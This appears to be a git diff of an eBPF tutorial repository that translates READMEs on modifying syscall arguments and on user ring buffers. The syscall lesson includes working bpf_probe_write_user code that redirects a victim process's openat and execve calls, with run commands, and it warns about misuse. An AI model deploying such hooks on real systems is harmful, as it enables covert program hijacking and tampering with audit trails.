```c SEC("tp/syscalls/sys_enter_execve") @@ -180,22 +180,20 @@ int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) } ``` -分析内核态代码: +Analysis of the kernel code: -- 执行 `bpf_get_current_pid_tgid` 获取当前进程ID和线程组ID。 -- 如果设置了 `target_ppid`,代码会检查当前进程的父进程ID是否匹配。 -- 读取第一个 `execve` 参数到 `prog_name`,这通常是将要执行的程序的路径。 -- 通过 `bpf_probe_write_user` 重写这个参数,使得系统实际执行的是一个不同的程序。 +- Execute `bpf_get_current_pid_tgid` to get the current process ID and thread group ID. +- If `target_ppid` is set, the code checks if the current process's parent process ID matches. +- Read the program name from the first argument of `execve`. +- Use `bpf_probe_write_user` to overwrite the argument with a hijacked binary path. -这种做法的风险在于它可以被用于劫持软件的行为,导致系统运行恶意代码。同样也可以使用 ecc 和 ecli 编译运行: +This approach poses a risk as it can be leveraged to hijack the behavior of software, resulting in the execution of malicious code on the system. Using ecc and ecli to compile and run: ```bash ./ecc exechijack.bpf.c exechijack.h sudo ./ecli run package.json ``` -## 总结 +## Conclusion -eBPF 提供了强大的能力来实现对正在运行的系统进行实时监控和干预。在合适的监管和安全策略配合下,这可以带来诸多好处,如安全增强、性能优化和运维便利。然而,这项技术的使用必须非常小心,因为错误的操作或滥用可能会对系统的正常运作造成破坏或者引发严重的安全事件。实践中,应确保只有授权用户和程序能够部署和管理 eBPF 程序,并且应当在隔离的测试环境中验证这些eBPF程序的行为,在充分理解其影响后才能将其应用到生产环境中。 - -您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +eBPF provides powerful capabilities for real-time monitoring and intervention in running systems. When used in conjunction with appropriate governance and security policies, this can bring many benefits such as enhanced security, performance optimization, and operational convenience. However, this technology must be used with great care as incorrect operations or misuse can result in system disruption or serious security incidents. In practice, it should be ensured that only authorized users and programs can deploy and manage eBPF programs, and their behavior should be validated in isolated test environments before they are applied in production. diff --git a/src/34-syscall/README.zh.md b/src/34-syscall/README.zh.md new file mode 100644 index 0000000..c2b63ab --- /dev/null +++ b/src/34-syscall/README.zh.md @@ -0,0 +1,201 @@ +# eBPF 开发实践:使用 eBPF 修改系统调用参数 + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 + +本教程介绍了如何使用 eBPF 修改正在进行的系统调用参数。这种技术可以用作安全审计、系统监视、或甚至恶意行为。然而需要特别注意,篡改系统调用参数可能对系统的稳定性和安全性带来负面影响,因此必须谨慎使用。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改系统调用参数,在内核读取用户空间内存之前,将其修改为我们想要的值。 + +本文的完整代码可以在 找到。 + +## 修改 open 系统调用的文件名 + +此功能用于修改 `openat` 系统调用的参数,让它打开一个不同的文件。这个功能可能可以用于: + +1. **文件访问审计**:在对法律合规性和数据安全性有严格要求的环境中,审计员可能需要记录所有对敏感文件的访问行为。通过修改 `openat` 系统调用参数,可以将所有尝试访问某个敏感文件的行为重定向到一个备份文件或者日志文件。 +2. **安全沙盒**:在开发早期阶段,可能希望监控应用程序尝试打开的文件。通过更改 `openat` 调用,可以让应用在一个安全的沙盒环境中运行,所有文件操作都被重定向到一个隔离的文件系统路径。 +3. 
**敏感数据保护**:对于存储有敏感信息的文件,例如配置文件中包含有数据库密码,一个基于 eBPF 的系统可以将这些调用重定向到一个加密的或暂存的位置,以增强数据安全性。 + +如果该技术被恶意软件利用,攻击者可以重定向文件操作,导致数据泄漏或者破坏数据完整性。例如,程序写入日志文件时,攻击者可能将数据重定向到控制的文件中,干扰审计跟踪。 + +内核态代码(部分,完整内容请参考 Github bpf-developer-tutorial): + +```c +SEC("tracepoint/syscalls/sys_enter_openat") +int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx) +{ + u64 pid = bpf_get_current_pid_tgid() >> 32; + /* use kernel terminology here for tgid/pid: */ + if (target_pid && pid != target_pid) { + return 0; + } + /* store arg info for later lookup */ + // since we can manually specify the attach process in userspace, + // we don't need to check the process allowed here + + struct args_t args = {}; + args.fname = (const char *)ctx->args[1]; + args.flags = (int)ctx->args[2]; + if (rewrite) { + bpf_probe_write_user((char*)ctx->args[1], "hijacked", 9); + } + bpf_map_update_elem(&start, &pid, &args, 0); + return 0; +} +``` + +分析内核态代码: + +- `bpf_get_current_pid_tgid()` 获取当前进程ID。 +- 如果指定了 `target_pid` 并且不匹配当前进程ID,函数直接返回。 +- 我们创建一个 `args_t` 结构来存储文件名和标志。 +- 使用 `bpf_probe_write_user` 修改用户空间内存中的文件名为 "hijacked"。 + +eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译: + +```bash +./ecc open_modify.bpf.c open_modify.h +``` + +使用 make 构建一个简单的 victim 程序,用来测试: + +```c +int main() +{ + char filename[100] = "my_test.txt"; + // print pid + int pid = getpid(); + std::cout << "current pid: " << pid << std::endl; + system("echo \"hello\" > my_test.txt"); + system("echo \"world\" >> hijacked"); + while (true) { + std::cout << "Opening my_test.txt" << std::endl; + + int fd = open(filename, O_RDONLY); + assert(fd != -1); + + std::cout << "test.txt opened, fd=" << fd << std::endl; + usleep(1000 * 300); + // print the file content + char buf[100] = {0}; + int ret = read(fd, buf, 5); + std::cout << "read " << ret << " bytes: " << buf << std::endl; + std::cout << "Closing test.txt..." << std::endl; + close(fd); + std::cout << "test.txt closed" << std::endl; + } + return 0; +} +``` + +测试代码编译并运行: + +```sh +$ ./victim +test.txt opened, fd=3 +read 5 bytes: hello +Closing test.txt... +test.txt closed +``` + +可以使用以下命令指定应修改其 `openat` 系统调用参数的目标进程ID: + +```bash +sudo ./ecli run package.json --rewrite --target_pid=$(pidof victim) +``` + +然后就会发现输出变成了 world,可以看到我们原先想要打开 "my_test.txt" 文件,但是实际上被劫持打开了 hijacked 文件: + +```console +test.txt opened, fd=3 +read 5 bytes: hello +Closing test.txt... +test.txt closed +Opening my_test.txt +test.txt opened, fd=3 +read 5 bytes: world +Closing test.txt... 
+test.txt closed +Opening my_test.txt +test.txt opened, fd=3 +read 5 bytes: world +``` + +包含测试用例的完整代码可以在 找到。 + +## 修改 bash execve 的进程名称 + +这段功能用于当 `execve` 系统调用进行时修改执行程序名称。在一些审计或监控场景,这可能用于记录特定进程的行为或修改其行为。然而,此类篡改可能会造成混淆,使得用户或管理员难以确定系统实际执行的程序是什么。最严重的风险是,如果恶意用户能够控制 eBPF 程序,他们可以将合法的系统命令重定向到恶意软件,造成严重的安全威胁。 + +```c +SEC("tp/syscalls/sys_enter_execve") +int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process of interest + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Read in program from first arg of execve + char prog_name[TASK_COMM_LEN]; + char prog_name_orig[TASK_COMM_LEN]; + __builtin_memset(prog_name, '\x00', TASK_COMM_LEN); + bpf_probe_read_user(&prog_name, TASK_COMM_LEN, (void*)ctx->args[0]); + bpf_probe_read_user(&prog_name_orig, TASK_COMM_LEN, (void*)ctx->args[0]); + prog_name[TASK_COMM_LEN-1] = '\x00'; + bpf_printk("[EXECVE_HIJACK] %s\n", prog_name); + + // Program can't be less than out two-char name + if (prog_name[1] == '\x00') { + bpf_printk("[EXECVE_HIJACK] program name too small\n"); + return 0; + } + + // Attempt to overwrite with hijacked binary path + prog_name[0] = '/'; + prog_name[1] = 'a'; + for (int i = 2; i < TASK_COMM_LEN ; i++) { + prog_name[i] = '\x00'; + } + long ret = bpf_probe_write_user((void*)ctx->args[0], &prog_name, 3); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + for (int i = 0; i < TASK_COMM_LEN; i++) { + e->comm[i] = prog_name_orig[i]; + } + bpf_ringbuf_submit(e, 0); + } + + return 0; +} +``` + +分析内核态代码: + +- 执行 `bpf_get_current_pid_tgid` 获取当前进程ID和线程组ID。 +- 如果设置了 `target_ppid`,代码会检查当前进程的父进程ID是否匹配。 +- 读取第一个 `execve` 参数到 `prog_name`,这通常是将要执行的程序的路径。 +- 通过 `bpf_probe_write_user` 重写这个参数,使得系统实际执行的是一个不同的程序。 + +这种做法的风险在于它可以被用于劫持软件的行为,导致系统运行恶意代码。同样也可以使用 ecc 和 ecli 编译运行: + +```bash +./ecc exechijack.bpf.c exechijack.h +sudo ./ecli run package.json +``` + +## 总结 + +eBPF 提供了强大的能力来实现对正在运行的系统进行实时监控和干预。在合适的监管和安全策略配合下,这可以带来诸多好处,如安全增强、性能优化和运维便利。然而,这项技术的使用必须非常小心,因为错误的操作或滥用可能会对系统的正常运作造成破坏或者引发严重的安全事件。实践中,应确保只有授权用户和程序能够部署和管理 eBPF 程序,并且应当在隔离的测试环境中验证这些eBPF程序的行为,在充分理解其影响后才能将其应用到生产环境中。 + +您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/34-syscall/README_en.md b/src/34-syscall/README_en.md deleted file mode 100644 index e64e5f5..0000000 --- a/src/34-syscall/README_en.md +++ /dev/null @@ -1,199 +0,0 @@ -# eBPF Development Practice: Modifying System Call Arguments with eBPF - -eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows user-defined code to be run, loaded, and updated without the need to modify kernel source code or reboot the kernel. This functionality has enabled a wide range of applications for eBPF, such as network and system performance analysis, packet filtering, and security policies. - -In this tutorial, we will explore how to use eBPF to modify the arguments of a running system call. This technique can be used for security auditing, system monitoring, or even malicious behavior. However, it is important to note that modifying system call arguments can have negative implications for system stability and security, so caution must be exercised. 
To implement this functionality, we will use the `bpf_probe_write_user` feature of eBPF, which allows us to modify memory in the user space and therefore modify system call arguments before the kernel reads them from user space. - -The complete code for this tutorial can be found in the repository on GitHub. - -## Modifying the File Name of the `open` System Call - -This functionality is used to modify the arguments of the `openat` system call to open a different file. This technique can be useful for: - -1. **File Access Auditing**: In environments with strict legal and data security requirements, auditors may need to record access to sensitive files. By modifying the `openat` system call arguments, all attempts to access a specific sensitive file can be redirected to a backup file or a log file. -2. **Secure Sandbox**: In the early stages of development, it may be desirable to monitor the files accessed by an application. By changing the `openat` calls, the application can be run in a secure sandbox environment where all file operations are redirected to an isolated file system path. -3. **Sensitive Data Protection**: For files containing sensitive information, such as a configuration file that contains database passwords, a eBPF-based system can redirect those calls to an encrypted or temporary location to enhance data security. - -If leveraged by malicious software, this technique can be used to redirect file operations resulting in data leaks or compromise data integrity. For example, when a program is writing to a log file, an attacker could redirect the data to a controlled file, disrupting the audit trail. - -Kernel code (partial code, see complete code on Github bpf-developer-tutorial): - -```c -SEC("tracepoint/syscalls/sys_enter_openat") -int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx) -{ - u64 pid = bpf_get_current_pid_tgid() >> 32; - /* use kernel terminology here for tgid/pid: */ - if (target_pid && pid != target_pid) { - return 0; - } - /* store arg info for later lookup */ - // since we can manually specify the attach process in userspace, - // we don't need to check the process allowed here - - struct args_t args = {}; - args.fname = (const char *)ctx->args[1]; - args.flags = (int)ctx->args[2]; - if (rewrite) { - bpf_probe_write_user((char*)ctx->args[1], "hijacked", 9); - } - bpf_map_update_elem(&start, &pid, &args, 0); - return 0; -} -``` - -Analysis of the kernel code: - -- `bpf_get_current_pid_tgid()` retrieves the current process ID. -- If `target_pid` is specified and does not match the current process ID, the function returns 0 and does not execute further. -- We create an `args_t` structure to store the file name and flags. -- We use `bpf_probe_write_user` to modify the file name in the user space memory to "hijacked". - -The `eunomia-bpf` is an open-source eBPF dynamic loading runtime and development toolchain aimed at making eBPF program development, building, distribution, and execution easier. You can refer to or for installing ecc compiler toolchain and ecli runtime. We will use `eunomia-bpf` to compile and run this example. 
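Note that the `openat` snippet stores into a `start` map and a `struct args_t` that the excerpt does not define. A minimal definition consistent with that usage — the actual header in the repository may differ — would be:

```c
/* Sketch of the pieces the snippet references but the excerpt omits. */
struct args_t {
    const char *fname; /* user-space pointer to the path argument */
    int flags;         /* open(2) flags */
};

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 10240);   /* sizing is an assumption */
    __type(key, u64);             /* tgid, as computed above */
    __type(value, struct args_t);
} start SEC(".maps");
```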
- -Compile the code: - -```bash -./ecc open_modify.bpf.c open_modify.h -``` - -Build a simple victim program using make for testing: - -```c -int main() -{ - char filename[100] = "my_test.txt"; - // print pid - int pid = getpid(); - std::cout << "current pid: " << pid << std::endl; - system("echo \"hello\" > my_test.txt"); - system("echo \"world\" >> hijacked"); - while (true) { - std::cout << "Opening my_test.txt" << std::endl; - - int fd = open(filename, O_RDONLY); - assert(fd != -1); - - std::cout << "test.txt opened, fd=" << fd << std::endl; - usleep(1000 * 300); - // print the file content - char buf[100] = {0}; - int ret = read(fd, buf, 5); - std::cout << "read " << ret << " bytes: " << buf << std::endl; - std::cout << "Closing test.txt..." << std::endl; - close(fd); - std::cout << "test.txt closed" << std::endl; - } - return 0; -} -``` - -Compile and run the test code: - -```sh -$ ./victim -test.txt opened, fd=3 -read 5 bytes: hello -Closing test.txt... -test.txt closed -``` - -Use the following command to specify the target process ID to modify the `openat` system call arguments: - -```bash -sudo ./ecli run package.json --rewrite --target_pid=$(pidof victim) -``` - -You will see that the output changes to "world". Instead of opening the "my_test.txt" file, it opens the "hijacked" file: - -```console -test.txt opened, fd=3 -read 5 bytes: hello -Closing test.txt... -test.txt closed -Opening my_test.txt -test.txt opened, fd=3 -read 5 bytes: world -Closing test.txt... -test.txt closed -Opening my_test.txt -test.txt opened, fd=3 -read 5 bytes: world -``` - -The complete code with test cases can be found in the repository. - -## Modifying the Process Name of bash `execve` - -This functionality is used to modify the program name when the `execve` system call is made. In certain auditing or monitoring scenarios, this may be used to track the behavior of specific processes or modify their behavior. However, such modifications can lead to confusion and make it difficult for users or administrators to determine the actual program being executed by the system. The most serious risk is that if malicious users are able to control the eBPF program, they could redirect legitimate system commands to malicious software, resulting in a significant security threat. 
- -```c -SEC("tp/syscalls/sys_enter_execve") -int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) -{ - size_t pid_tgid = bpf_get_current_pid_tgid(); - // Check if we're a process of interest - if (target_ppid != 0) { - struct task_struct *task = (struct task_struct *)bpf_get_current_task(); - int ppid = BPF_CORE_READ(task, real_parent, tgid); - if (ppid != target_ppid) { - return 0; - } - } - - // Read in program from first arg of execve - char prog_name[TASK_COMM_LEN]; - char prog_name_orig[TASK_COMM_LEN]; - __builtin_memset(prog_name, '\x00', TASK_COMM_LEN); - bpf_probe_read_user(&prog_name, TASK_COMM_LEN, (void*)ctx->args[0]); - bpf_probe_read_user(&prog_name_orig, TASK_COMM_LEN, (void*)ctx->args[0]); - prog_name[TASK_COMM_LEN-1] = '\x00'; - bpf_printk("[EXECVE_HIJACK] %s\n", prog_name); - - // Program can't be less than out two-char name - if (prog_name[1] == '\x00') { - bpf_printk("[EXECVE_HIJACK] program name too small\n"); - return 0; - } - - // Attempt to overwrite with hijacked binary path - prog_name[0] = '/'; - prog_name[1] = 'a'; - for (int i = 2; i < TASK_COMM_LEN ; i++) { - prog_name[i] = '\x00'; - } - long ret = bpf_probe_write_user((void*)ctx->args[0], &prog_name, 3); - - // Send an event - struct event *e; - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (e) { - e->success = (ret == 0); - e->pid = (pid_tgid >> 32); - for (int i = 0; i < TASK_COMM_LEN; i++) { - e->comm[i] = prog_name_orig[i]; - } - bpf_ringbuf_submit(e, 0); - } - - return 0; -} -``` - -Analysis of the kernel code: - -- Execute `bpf_get_current_pid_tgid` to get the current process ID and thread group ID. -- If `target_ppid` is set, the code checks if the current process's parent process ID matches. -- Read the program name from the first argument of `execve`. -- Use `bpf_probe_write_user` to overwrite the argument with a hijacked binary path. - -This approach poses a risk as it can be leveraged to hijack the behavior of software, resulting in the execution of malicious code on the system. Using ecc and ecli to compile and run: - -```bash -./ecc exechijack.bpf.c exechijack.h -sudo ./ecli run package.json -``` - -## Conclusion - -eBPF provides powerful capabilities for real-time monitoring and intervention in running systems. When used in conjunction with appropriate governance and security policies, this can bring many benefits such as enhanced security, performance optimization, and operational convenience. However, this technology must be used with great care as incorrect operations or misuse can result in system disruption or serious security incidents. In practice, it should be ensured that only authorized users and programs can deploy and manage eBPF programs, and their behavior should be validated in isolated test environments before they are applied in production. diff --git a/src/35-user-ringbuf/README.md b/src/35-user-ringbuf/README.md index 85affed..769f6b7 100644 --- a/src/35-user-ringbuf/README.md +++ b/src/35-user-ringbuf/README.md @@ -1,42 +1,42 @@ -# eBPF开发实践:使用 user ring buffer 向内核异步发送信息 +# eBPF Development Practices: Asynchronously Send to Kernel with User Ring Buffer -eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 +eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro programs" in kernel mode, thereby changing system behavior or collecting fine-grained performance data without modifying kernel code. 
-eBPF的一个独特之处是它不仅可以在内核态运行程序,从而访问系统底层的状态和资源,同时也可以通过特殊的数据结构与用户态程序进行通信。关于这方面的一个重要概念就是内核态和用户态之间的环形队列——ring buffer。在许多实时或高性能要求的应用中,环形队列是一种常用的数据结构。由于它的FIFO(先进先出)特性,使得数据在生产者和消费者之间可以持续、线性地流动,从而避免了频繁的IO操作和不必要的内存 reallocation开销。 +One unique aspect of eBPF is that it not only allows programs to run in kernel mode to access low-level system states and resources, but it can also communicate with user mode programs through special data structures. One important concept in this regard is the ring buffer between kernel mode and user mode. In many real-time or high-performance applications, the ring buffer is a commonly used data structure. Due to its FIFO (first in, first out) characteristics, data can flow continuously and linearly between the producer and the consumer, avoiding frequent IO operations and unnecessary memory reallocation overhead. -在eBPF中,分别提供了两种环形队列: user ring buffer 和 kernel ring buffer,以实现用户态和内核态之间的高效数据通信。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 +In eBPF, two types of ring buffers are provided: user ring buffer and kernel ring buffer, to achieve efficient data communication between user mode and kernel mode. This article is part of the eBPF developer tutorial. More detailed content can be found here: The source code is open source in the . -## 用户态和内核态环形队列—user ring buffer和kernel ring buffer +## User mode and kernel mode ring buffers—user ring buffer and kernel ring buffer -围绕内核态和用户态这两个主要运行级别,eBPF提供了两种相应的环形队列数据结构:用户态环形队列——User ring buffer和内核态环形队列——Kernel ring buffer。 +Around the two main run levels of kernel mode and user mode, eBPF provides two corresponding ring buffer data structures: User ring buffer and Kernel ring buffer. -Kernel ring buffer 则由 eBPF实现,专为Linux内核设计,用于追踪和记录内核日志、性能统计信息等,它的能力是内核态和用户态数据传输的核心,可以从内核态向用户态传送数据。Kernel ring buffer 在 5.7 版本的内核中被引入,目前已经被广泛应用于内核日志系统、性能分析工具等。 +Kernel ring buffer is implemented by eBPF and is specially designed for the Linux kernel to track and record kernel logs, performance statistics, etc. It is the core of data transfer from kernel mode to user mode and can send data from kernel mode to user mode. Kernel ring buffer was introduced in the 5.7 version of the kernel and is now widely used in the kernel logging system, performance analysis tools, etc. -对于内核态往用户态发送应用场景,如内核监控事件的发送、异步通知、状态更新通知等,ring buffer 数据结构都能够胜任。比如,当我们需要监听网络服务程序的大量端口状态时,这些端口的开启、关闭、错误等状态更新就需由内核实时传递到用户空间进行处理。而Linux 内核的日志系统、性能分析工具等,也需要频繁地将大量数据发送到用户空间,以支持用户人性化地展示和分析这些数据。在这些场景中,ring buffer在内核态往用户态发送数据中表现出了极高的效率。 +For scenarios where the kernel sends to user mode, such as sending kernel monitoring events, asynchronous notifications, status update notifications, etc., the ring buffer data structure can handle them. For example, when we need to monitor the status of a large number of ports of network service programs, the opening, closing, errors, and other status updates of these ports need to be real-time transferred to the user space for processing. Linux kernel's logging system, performance analysis tools, etc., also need to frequently send large amounts of data to user space to support user-friendly display and analysis of these data. In these scenarios, the ring buffer shows extremely high efficiency in sending data from the kernel to the user. 
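For the kernel-to-user direction just described, the canonical producer pattern for a `BPF_MAP_TYPE_RINGBUF` map looks like the following minimal sketch (the event layout and tracepoint are illustrative, not the tutorial's actual code):

```c
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);
} kernel_ringbuf SEC(".maps");

struct event {
    int pid;
    char comm[16];
};

SEC("tracepoint/sched/sched_process_exit")
int report_exit(void *ctx)
{
    struct event *e = bpf_ringbuf_reserve(&kernel_ringbuf, sizeof(*e), 0);
    if (!e)
        return 0; /* buffer full: drop this event */

    e->pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&e->comm, sizeof(e->comm));
    bpf_ringbuf_submit(e, 0); /* becomes visible to the user-space poller */
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
```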
-User ring buffer 是基于环形缓冲器的一种新型 Map 类型,它提供了单用户空间生产者/单内核消费者的语义。这种环形队列的优点是对异步消息传递提供了优秀的支持,避免了不必要的同步操作,使得内核到用户空间的数据传输可以被优化,并且降低了系统调用的系统开销。User ring buffer 在 6.1 版本的内核中被引入,目前的使用场景相对较少。 +User ring buffer is a new type of Map type based on the ring buffer, it provides the semantics of a single user space producer/single kernel consumer. The advantage of this ring buffer is that it provides excellent support for asynchronous message passing, avoiding unnecessary synchronization operations, optimizing data transfer from the kernel to user space, and reducing the system overhead of system calls. User ring buffer was introduced in the 6.1 version of the kernel and its current use cases are relatively limited. -bpftime 是一个用户空间 eBPF 运行时,允许现有 eBPF 应用程序在非特权用户空间使用相同的库和工具链运行。它为 eBPF 提供了 Uprobe 和 Syscall 跟踪点,与内核 Uprobe 相比,性能有了显著提高,而且无需手动检测代码或重启进程。运行时支持用户空间共享内存中的进程间 eBPF 映射,也兼容内核 eBPF 映射,允许与内核 eBPF 基础架构无缝运行。它包括一个适用于各种架构的高性能 LLVM JIT,以及一个适用于 x86 的轻量级 JIT 和一个解释器。GitHub 地址: +bpftime is a user space eBPF runtime that allows existing eBPF applications to run in unprivileged user space using the same libraries and toolchain. It provides Uprobe and Syscall tracing points for eBPF, which significantly improves performance compared to kernel Uprobe and does not require manual code detection or process restart. The runtime supports process eBPF mapping in user space shared memory, and is also compatible with kernel eBPF mapping, allowing seamless operation with the kernel eBPF infrastructure. It includes a high-performance LLVM JIT for various architectures, a lightweight JIT for x86, and an interpreter. GitHub address: -在 bpftime 中,我们使用 user ring buffer 来实现用户态 eBPF 往内核态 eBPF 发送数据,并更新内核态 eBPF 对应的 maps,让内核态和用户态的 eBPF 一起协同工作。user ring buffer 的异步特性,可以避免系统调用不必要的同步操作,从而提高了内核态和用户态之间的数据传输效率。 +In bpftime, we use the user ring buffer to implement data transmission from user mode eBPF to kernel mode eBPF, and update the maps corresponding to kernel mode eBPF, so that kernel mode and user mode eBPF can work together. The asynchronous characteristics of user ring buffer can avoid unnecessary synchronization operations of system calls, thereby improving the efficiency of data transmission between kernel mode and user mode. -eBPF 的双向环形队列也和 io_uring 在某些方面有相似之处,但它们的设计初衷和应用场景有所不同: +The bi-directional ring buffer of eBPF also has similarities to io_uring in some respects, but their design intentions and use cases are different: -- **设计焦点**:io_uring主要专注于提高异步I/O操作的性能和效率,而eBPF的环形队列更多关注于内核和用户空间之间的数据通信和事件传输。 -- **应用范围**:io_uring主要用于文件I/O和网络I/O的场景,而eBPF的环形队列则更广泛,不限于I/O操作,还包括系统调用跟踪、网络数据包处理等。 -- **灵活性和扩展性**:eBPF提供了更高的灵活性和扩展性,允许用户定义复杂的数据处理逻辑,并在内核态执行。 +- **Design focus**: io_uring primarily focuses on improving the performance and efficiency of asynchronous I/O operations, while eBPF's ring buffer focuses more on data communication and event transmission between the kernel and user space. +- **Application range**: io_uring is mainly used in file I/O and network I/O scenarios, while eBPF's ring buffer is more widespread, not limited to I/O operations, but also including system call tracing, network packet processing, etc. +- **Flexibility and extensibility**: eBPF provides higher flexibility and extensibility, allowing users to define complex data processing logic and execute it in kernel mode. 
-下面,我们将通过一段代码示例,详细展示如何利用 user ring buffer,实现从用户态向内核传送数据,并以 kernel ring buffer 相应地从内核态向用户态传送数据。 +Following is a code example where we will show in detail how to use user ring buffer to transmit data from user mode to the kernel, and how to respond accordingly with kernel ring buffer to transmit data from kernel mode to user mode. -## 一、实现:在用户态和内核态间使用 ring buffer 传送数据 +## I. Implementation: Using Ring Buffer to Transfer Data Between User Mode and Kernel Mode -借助新的 BPF MAP,我们可以实现在用户态和内核态间通过环形缓冲区传送数据。在这个示例中,我们将详细说明如何在用户空间创建一个 "用户环形缓冲区" (user ring buffer) 并向其写入数据,然后在内核空间中通过 `bpf_user_ringbuf_drain` 函数来消费这些数据。同时,我们也会使用 "内核环形缓冲区" (kernel ring buffer) 来从内核空间反馈数据到用户空间。为此,我们需要在用户空间和内核空间分别创建并操作这两个环形缓冲区。 +With the help of the new BPF MAP, we can implement the transfer of data between user mode and kernel mode through the ring buffer. In this example, we will detail how to create a "user ring buffer" in user space and write data to it and then consume this data in kernel space with the `bpf_user_ringbuf_drain` function. At the same time, we will use the "kernel ring buffer" to feed back data from kernel space to user space. To do this, we need to create and operate these two ring buffers separately in user space and kernel space. -完整的代码可以在 中找到。 +The complete code can be found at . -### 创建环形缓冲区 +### Create Ring Buffer -在内核空间,我们创建了一个类型为 `BPF_MAP_TYPE_USER_RINGBUF` 的 `user_ringbuf`,以及一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 `kernel_ringbuf`。在用户空间,我们创建了一个 `struct ring_buffer_user` 结构体的实例,并通过 `ring_buffer_user__new` 函数和对应的操作来管理这个用户环形缓冲区。 +In kernel mode, we created a `user_ringbuf` of type `BPF_MAP_TYPE_USER_RINGBUF` and a `kernel_ringbuf` of type `BPF_MAP_TYPE_RINGBUF`. In user mode, we created an instance of the `struct ring_buffer_user` structure and managed this user ring buffer through the `ring_buffer_user__new` function and corresponding operations. ```c /* Set up ring buffer polling */ @@ -50,9 +50,9 @@ eBPF 的双向环形队列也和 io_uring 在某些方面有相似之处,但 user_ringbuf = user_ring_buffer__new(bpf_map__fd(skel->maps.user_ringbuf), NULL); ``` -### 编写内核态程序 +### Writing Kernel Mode Programs -我们定义一个 `kill_exit` 的 tracepoint 程序,每当有进程退出时,它会通过 `bpf_user_ringbuf_drain` 函数读取 `user_ringbuf` 中的用户数据,然后通过 `bpf_ringbuf_reserve` 函数在 `kernel_ringbuf` 中创建一个新的记录,并写入相关信息。最后,通过 `bpf_ringbuf_submit` 函数将这个记录提交,使得该记录能够被用户空间读取。 +We define a `kill_exit` tracepoint program that will read user data from `user_ringbuf` with the `bpf_user_ringbuf_drain` function whenever a process exits. Then, it creates a new record in `kernel_ringbuf` with the `bpf_ringbuf_reserve` function and writes relevant information. Finally, the record is submitted with the `bpf_ringbuf_submit` function so that it can be read by user mode. ```c // SPDX-License-Identifier: GPL-2.0 @@ -115,9 +115,9 @@ int kill_exit(struct trace_event_raw_sys_exit *ctx) } ``` -### 编写用户态程序 +### Writing User Mode Programs -在用户空间,我们通过 `ring_buffer_user__reserve` 函数在 ring buffer 中预留出一段空间,这段空间用于写入我们希望传递给内核的信息。然后,通过 `ring_buffer_user__submit` 函数提交数据,之后这些数据就可以在内核态被读取。 +In user mode, we reserved a section of space in the ring buffer with the `ring_buffer_user__reserve` function. This space is used to write the information we want to pass to the kernel. Then, the data is submitted using the `ring_buffer_user__submit` function, after which this data can be read and processed in kernel mode. 
```c
static int write_samples(struct user_ring_buffer *ringbuf)
@@ -155,9 +155,9 @@ done:
}
```

-### 初始化环形缓冲区并轮询
+### Initializing and Polling the Ring Buffer

-最后,对 ring buffer 进行初始化并定时轮询,这样我们就可以实时得知内核态的数据消费情况,我们还可以在用户空间对 `user_ringbuf` 进行写入操作,然后在内核态对其进行读取和处理。
+Finally, we initialize the ring buffer and poll it periodically, so that we can observe in real time how the data is consumed in kernel mode; we can also write to `user_ringbuf` from user space and then read and process the data in kernel mode.

```c
 write_samples(user_ringbuf);
@@ -182,19 +182,19 @@ done:
 }
```

-通过以上步骤,我们实现了用户态与内核态间环形缓冲区的双向数据传输。
+Through the above steps, we have implemented bidirectional data transfer between user mode and kernel mode via ring buffers.

-## 二、编译和运行代码
+## II. Compiling and Running the Code

-为了编译和运行以上代码,我们可以通过以下命令来实现:
+To compile and run the above code, run the following command:

```sh
make
```

-关于如何安装依赖,请参考:
+For information on how to install dependencies, refer to:

-运行结果将展示如何使用 user ring buffer 和 kernel ringbuffer 在用户态和内核态间进行高效的数据传输:
+The output shows how the user ring buffer and kernel ring buffer enable efficient data transfer between user mode and kernel mode:

```console
$ sudo ./user_ringbuf
@@ -210,14 +210,14 @@ Draining current samples...
Draining current samples...
```

-## 总结
+## Conclusion

-在本篇文章中,我们介绍了如何使用eBPF的user ring buffer和kernel ring buffer在用户态和内核态之间进行数据传输。通过这种方式,我们可以有效地将用户态的数据传送给内核,或者将内核生成的数据反馈给用户,从而实现了内核态和用户态的双向通信。
